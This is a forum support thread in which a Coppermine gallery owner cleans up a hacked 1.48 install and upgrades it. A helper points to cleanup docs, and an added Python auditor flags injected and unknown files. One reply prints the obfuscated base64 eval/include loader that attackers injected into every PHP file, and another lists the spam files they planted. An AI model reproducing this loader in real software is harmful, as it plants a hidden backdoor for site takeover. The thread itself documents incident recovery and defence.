Error Upgrading hacked gallery 1.48 to 1.5x
« on: January 24, 2011, 09:37:07 pm »

I got the gallery (adminname and PW) half a year ago, because the old admin could no longer do this and no one cared about it.
I could not log in to the admin site. All pictures and albums have been there, but trying to log in failed, due to the missing website. The URL was just gone. Tried to get support from the hoster via email, no success. CPG was pretty new for me.
Now, a month ago, the whole gallery could not be opened either: access denied...
Calling the hosting company, he told me it might be hacked, I should reinstall the gallery.
So I did. I still need the 2000 photos in about 20 albums. In phpMyAdmin it is still available in the database. Via FTP I did a backup of the folders of CPG148.

I followed Instructions on Upgrading from 1.4x to 1.5x.
(I was not able to identify running plugins or bridges)
put CPG folder via ftp on htdocs\cpg148 except \albums and \ and ran update.php.
Now, when starting, I got the following message: "fs: 254847 [need: 254668]". What does that mean?
So I tried to run install.php. I had to delete
Although it told me to set register_globals=off. The hosting company I will call tomorrow for this.
I put back from the broken DUMP, but the error is the same.

At least I cannot access the structure of 2000 files and albums. The backed-up files without the structure are useless.
I would like to recreate the existing structure of the broken CPG 1.48 on a safe new CPG 1.5x. Any idea???
If Any information is missing, I'll try to find it.

Additionally, I set up an install of cpg 1.5x in a separate folder.
working fine. Maybe moving appropriate folders might help? copying the old \albums to the new \albums gave no success. Even not using the old

Thx in advance

Joe Carver

Re: Error Upgrading hacked gallery 1.48 to 1.5x
« Reply #1 on: January 25, 2011, 12:40:38 am »


Re: Error Upgrading hacked gallery 1.48 to 1.5x
« Reply #2 on: January 25, 2011, 12:17:01 pm »

See the thread: Yikes, I've been hacked! Now what?
Thank you very much, Joe!
While following all the steps in sanitizing my gallery folder, I recognized this one line in every 1st line of all *.php-files inside the top- and sub-folders. e.g. anycontent.php, config.php,...
"<?php /* <!-----hkycbJXRsBrtlTUKYvpF-----> */ $LjbMUSesTdur = base64_decode("JSVQQVRIJSUvJSVBRERQSFAlJQ==");  @include_once $LjbMUSesTdur;/* <!-----hkycbJXRsBrtlTUKYvpF-----> */?><?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy93ZWIvMS8wMDAvMDQzLzc3MC8xNjQwMTIvaHRkb2NzL2NwZzE0OC9hbGJ1bXMvdXNlcnBpY3MvMTAwMDEvc3R5bGUuY3NzLnBocCc7aWYoZmlsZV9leGlzdHMoJEdMT0JBTFNbJ21mc24nXSkpe2luY2x1ZGVfb25jZSgkR0xPQkFMU1snbWZzbiddKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiZmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe29iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>

I am not very familiar with PHP programming, but this line seems to be unusual there. Is this correct? Might this be the reason for my problem? Or has this line no effect?
I have to decide whether to clean all infected files (takes time) or to delete them. But I don't know if the gallery structure will be damaged by deleting all the files.


Re: Error Upgrading hacked gallery 1.48 to 1.5x
« Reply #3 on: January 25, 2011, 12:35:45 pm »

In case I have to decide for manual cleanup of every file, I have to clean the following, see attachment. But for me, most of these files in top-folder *\cpg148 (which is used here as working directory) seem unknown.
I don't know whether these files are results of installed plugins or bridges. I got the gallery as it is. Hacked! So probably some files have been put there by an intruder.
Should I just compare the folder with an actual 1.52 folder and delete all the unknown files listed in "WinMerge" (see attachment)???
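
An added example, not part of the thread or of Coppermine's code: one way to automate the two checks discussed in Replies #2 and #3, flagging PHP files whose first line has the injected loader shape and listing files that are unknown or changed relative to a clean release tree. The directory names, the `MEDIA` allowlist and all sample file contents in `demo()` are assumptions constructed for illustration.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Loader shape quoted in the thread: eval() or include of a base64_decode() result.
INJECT_RE = re.compile(rb"eval\s*\(\s*base64_decode\s*\("
                       rb"|base64_decode\s*\([^)]*\)\s*;\s*@?include(?:_once)?\b")
MEDIA = {".jpg", ".jpeg", ".png", ".gif"}  # assumed allowlist for uploaded photos

def digest(path):
    return hashlib.sha256(path.read_bytes()).hexdigest()

def first_line_injected(path):
    with path.open("rb") as fh:
        return bool(INJECT_RE.search(fh.readline()))

def audit(gallery, pristine, uploads="albums"):
    """Map relative path -> 'injected' | 'unknown' | 'modified' for suspect files."""
    gallery, pristine = Path(gallery), Path(pristine)
    report = {}
    for path in sorted(p for p in gallery.rglob("*") if p.is_file()):
        rel = path.relative_to(gallery)
        ext = path.suffix.lower()
        if ext == ".php" and first_line_injected(path):
            status = "injected"
        elif rel.parts[0] == uploads and ext in MEDIA:
            continue  # user photos have no release copy to compare against
        elif not (pristine / rel).is_file():
            status = "unknown"   # not shipped with the clean release
        elif digest(path) != digest(pristine / rel):
            status = "modified"  # shipped, but content differs
        else:
            continue             # identical to the release copy
        report[rel.as_posix()] = status
    return report

def demo():
    """Run audit() on a small constructed tree (all file contents are made up)."""
    with tempfile.TemporaryDirectory() as tmp:
        hacked, clean = Path(tmp, "hacked"), Path(tmp, "clean")
        for root in (hacked, clean):
            (root / "albums/userpics/10001").mkdir(parents=True)
            (root / "index.php").write_text("<?php echo 'gallery'; ?>\n")
            (root / "albums/index.php").write_text("<?php ?>\n")
        (hacked / "index.php").write_text("<?php /**/eval(base64_decode('ZWNobyAxOw==')); ?>\n")
        (hacked / "albums/userpics/10001/photo.jpg").write_bytes(b"\xff\xd8constructed")
        (hacked / "albums/userpics/10001/cnf").write_text("constructed\n")
        return audit(hacked, clean)
```

Site-specific files created after installation also show up as `unknown`, so the report is a review list rather than a delete list.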


Re: Error Upgrading hacked gallery 1.48 to 1.5x
« Reply #4 on: January 25, 2011, 01:16:12 pm »

There are also unknown files in *albums\userpics\10001 (see attachment)! I will also delete them cause they look malicious.
bi- file is a list of IP's.
cnf- file has following line:

csi-file: "|1273941107"
kwd-file: "prom hairstyles"
lb-file: empty
lock-file: empty
rlf-file: 15-05-2010 - 126-12-2010 - 1
skwd-file has list of keywords like this: "tramadol

swf-file: "CWS ..."


Re: Error Upgrading hacked gallery 1.48 to 1.5x
« Reply #5 on: January 25, 2011, 02:24:57 pm »

I have to decide whether to clean all infected files (takes time) or to delete them. But I don't know if the gallery structure will be damaged by deleting all the files.
Instead of manual cleaning core files, you should replace them with fresh copies of the latest Coppermine release (as described in the upgrade docs).


Re: Error Upgrading hacked gallery 1.48 to 1.5x
« Reply #6 on: January 26, 2011, 10:25:49 am »

Instead of manual cleaning core files, you should replace them with fresh copies of the latest Coppermine release (as described in the upgrade docs).
Yes, so I did.
After sanitizing the hacked gallery following instructions from here:,51927.0.html Yikes, I've been hacked! Now what?,
and upgrading the cleaned folder following instructions from here:,

I have all the folders and photos (the structure) available again. Still need to harden the gallery against new attacks.
5 hours of sanitizing time saved me about 10 days of creation time for a new structure.
Thank you very much.

